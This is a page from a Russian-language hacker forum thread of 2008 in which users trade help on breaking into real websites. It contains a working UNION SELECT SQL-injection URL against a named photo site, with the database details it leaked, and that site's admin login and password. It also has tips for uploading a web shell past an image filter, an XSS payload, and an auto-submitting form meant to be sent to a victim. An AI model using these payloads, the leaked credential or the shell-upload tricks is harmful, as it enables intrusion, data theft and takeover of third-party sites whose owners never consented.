Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. tor4)

    tor4) Elder - Старейшина

    Joined:
    27 May 2008
    Messages:
    45
    Likes Received:
    21
    Reputations:
    -6
    Опять я, опять Парюсь))
    http://ua-foto.com/fotogal/:442%27/

    День бюся результата ноль)

    либо
    http://ua-foto.com/eshop/121/0:226'/
    он мне более нравица))

    cms webo

    При запросе:
    http://ua-foto.com/eshop/121/0:226%20and%201=1%20order%20by%201/*

    Уже надрываеца Unknown column '20and' in 'where clause'
     
    #3221 tor4), 8 Sep 2008
    Last edited: 8 Sep 2008
    3 people like this.
  2. LUKAC

    LUKAC Banned

    Joined:
    19 Aug 2007
    Messages:
    0
    Likes Received:
    6
    Reputations:
    0
    tor4) , вроде ничего выкрутить нельзя)
     
  3. o314um

    o314um Member

    Joined:
    16 Nov 2006
    Messages:
    227
    Likes Received:
    90
    Reputations:
    7
    там 2 запроса к БД
     
  4. Grema

    Grema Elder - Старейшина

    Joined:
    29 Nov 2005
    Messages:
    109
    Likes Received:
    16
    Reputations:
    -4
    _http://ua-foto.com/eshop/143'
    тут тоже скуля и раскрытие пути. может че-то накопаешь
    а вот тут уже интереснее, нашёл:
    _http://ua-foto.com/search/10/167/0/?&qs=&f[226]=&sf226=:3&sf447=-1)%20union%20select%201/*&f[447]=4&go=1&sort_type=1
    перебрал и получил:
    _http://ua-foto.com/search/10/167/0/?&qs=&f[226]=&sf226=:3&sf447=-1)%20UNION%20SELECT%201,2,3,4,5,6,7,8,concat_ws(0x3a3a3a,version(),user(),database()),10,11,12,13,14,15,16,17,18,19,20,21,22/*&f[447]=4&go=1&sort_type=1

    Поля вывода: 1,7,9,14. 9 самое нормально поле)

    получили)
    5.0.27:::uaphoto@localhost:::uaphoto
     
    #3224 Grema, 8 Sep 2008
    Last edited: 8 Sep 2008
    4 people like this.
  5. .Striker

    .Striker Elder - Старейшина

    Joined:
    11 Nov 2007
    Messages:
    82
    Likes Received:
    63
    Reputations:
    -4
    Похекал я админку на одном сайте, а там что бы загрузить файл на сервер можно использовать только скрипт загрузчика картинок
    а в нем такой код присутствует
    PHP:
        //File Name Check
        
    if (( $file_name ==".jpg")||( $file_name ==".jpeg")||( $file_name ==".png")||( $file_name ==".gif"))
        { 
            
    $message "Invalid File Name Specified, be sure its a '.jpg'";
            return 
    $message;
        }
    и
    PHP:
        //File Type Check
        
    else if ( $file_type == "text/plain" ) {
            
    $message "Sorry, You cannot upload any script file" ;
            return 
    $message;
        }
    можно как то обойти эти фильтры?
     
  6. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    546
    Likes Received:
    284
    Reputations:
    -56
    .Striker, увидеть бы объявление $file_name.

    А вообще попробуй назвать файл shell.jpg.php и майм-тайп смени.
     
    2 people like this.
  7. .Striker

    .Striker Elder - Старейшина

    Joined:
    11 Nov 2007
    Messages:
    82
    Likes Received:
    63
    Reputations:
    -4
    пробовал загрузить обычную картинку оно не хочет :)
    видимо они что то там накосячили
     
  8. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Grema
    ua-foto.com/admin/ - admin:stepanov

    немогу залить шелл) попробуйте..
     
    1 person likes this.
  9. dArKkNiGHt

    dArKkNiGHt Banned

    Joined:
    18 Aug 2008
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    не могу догнать что можно сделать:
    нашёл xss в поиске,
    Code:
    "><script>alert(/xss/)</script>
    показывает мне сообщение. форма поиска методом POST работает.
    я так понимаю это пассивная xss и мне нужно каким-то образом заставить админа кликнуть на Поиск с моими параметрами?
    какие ещё могут быть варианты применения данной дыры?
     
  10. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,390
    Likes Received:
    1,209
    Reputations:
    475
    посмотри , скорее всего в гете тоже есть полный вид запроса
    Если нет, отлови ПОСТ запросы и попробуй через гет отправить
     
  11. De-visible

    De-visible [NDC] Network develope c0ders

    Joined:
    6 Jan 2008
    Messages:
    918
    Likes Received:
    550
    Reputations:
    66
    Есть парочку показательных видео..что делать с пассивками как впаривать, и вообще как обращаться)
    Гляньтут
     
  12. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,675
    Likes Received:
    1,028
    Reputations:
    1,228
    PHP:
    <form name='wtf' method='post' action='http://site.ru/search.php'>
    <
    input type='hidden' name='search' value='"><script>alert(/xss/)</script>'>
    </
    form>
    <
    script>wtf.submit();</script>
    правишь то что тебе надо, сохраняешь в .html и кидаешь ссылку на файл жертве
     
    _________________________
    2 people like this.
  13. Karapuziko

    Karapuziko Elder - Старейшина

    Joined:
    20 Jan 2008
    Messages:
    32
    Likes Received:
    14
    Reputations:
    3
    Можно ли как то на JavaScript выдернуть сессию?
    то есть не куки а сессию...?
     
  14. Rejjin

    Rejjin Elder - Старейшина

    Joined:
    20 Jul 2008
    Messages:
    83
    Likes Received:
    46
    Reputations:
    0
    Вот не могу понять, есть сайт http://www.wen.ru/ на нем есть форум. Шелл просто так не залить, для картинки просит урл. Можно ли сделать так. Залить картинку в которой будет либо шелл, либо редирект на урл с шеллом. И получится ли? А может есть какой то другой способ?
     
  15. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    546
    Likes Received:
    284
    Reputations:
    -56
    Rejjin, чтобы шелл-картинка сработал надо иметь инклюд под рукой. Или он просто не выполница как пхп-код и всё.
     
  16. o314um

    o314um Member

    Joined:
    16 Nov 2006
    Messages:
    227
    Likes Received:
    90
    Reputations:
    7
    забыл как называется данный движок.
    Вот скрин админки:

    [​IMG]
    кто знает - отпишитесть
     
  17. .Striker

    .Striker Elder - Старейшина

    Joined:
    11 Nov 2007
    Messages:
    82
    Likes Received:
    63
    Reputations:
    -4
    o3,14um
    cutenews
     
    2 people like this.
  18. BalticFan

    BalticFan New Member

    Joined:
    15 Aug 2008
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    PHP:
    phpBB Critical Error

    Error creating 
    new session

    DEBUG MODE

    SQL Error 
    1114 The table 'phpbb_sessions' is full

    INSERT INTO phpbb_sessions 
    (session_idsession_user_idsession_startsession_timesession_ipsession_pagesession_logged_insession_adminVALUES ('d28f3eaae27fac24621bd1563ea4a3f9'1510312211424941221142494'59bee7c5'010)

    Line 205
    File 
    sessions.php


    Что я с этого могу поиметь
    ?
     
  19. [Dezzter]

    [Dezzter] Elder - Старейшина

    Joined:
    26 Nov 2007
    Messages:
    184
    Likes Received:
    132
    Reputations:
    3
    Дуню Кулачкову
     
    #3239 [Dezzter], 11 Sep 2008
    Last edited: 11 Sep 2008
    4 people like this.
  20. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
     
Loading...
Thread Status:
Not open for further replies.